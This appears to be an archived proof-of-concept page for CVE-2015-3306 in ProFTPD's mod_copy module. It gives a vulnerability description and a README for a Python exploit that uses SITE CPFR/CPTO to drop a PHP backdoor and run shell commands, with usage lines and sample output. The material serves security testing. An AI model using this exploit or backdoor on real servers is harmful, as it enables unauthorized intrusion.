Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-3306 PoC — ProFTPD mod_copy模块信息泄露漏洞

Source
Associated Vulnerability
Title:ProFTPD mod_copy模块信息泄露漏洞 (CVE-2015-3306)
Description:ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。 ProFTPD 1.3.5版本的mod_copy模块中存在安全漏洞。远程攻击者可借助site cpfr和site cpto命令利用该漏洞读取和写入任意文件。
Readme
# CVE-2015-3306 ProFTPD Exploit

This repository contains a Python proof-of-concept (PoC) exploit for **CVE-2015-3306** 

> ⚠️ **Warning:** Only use this against systems you own or have explicit permission to test. Unauthorized exploitation is illegal.

---

## Author

**Mohamed EL-KHAROUATI**

---

## Part 1: CVE-2015-3306 ProFTPD Exploit

### Description

CVE-2015-3306 is a directory traversal vulnerability in ProFTPD 1.3.5b and earlier. This exploit allows copying arbitrary files and dropping a PHP backdoor into the webroot. The backdoor can execute arbitrary shell commands.

### Features

- Exploits the directory traversal vulnerability via the `SITE CPFR/CPTO` FTP commands.
- Drops a PHP backdoor (`backdoor.php`) into the specified webroot.
- Executes arbitrary shell commands through the backdoor.
- Supports custom commands via `--rcommand`.

### Requirements

- Python 3.x
- `requests` library (`pip install requests`)

### Usage, Output, and Cleanup (Single Code Block)

```bash
# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>

# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami

# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip> 
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done


File Snapshot

[4.0K] /data/pocs/e40e02cbba654972d6ad3c9f2f8b14562ac323c9 ├── [2.2K] exploit-ftp.py ├── [1.1K] LICENCE └── [1.4K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.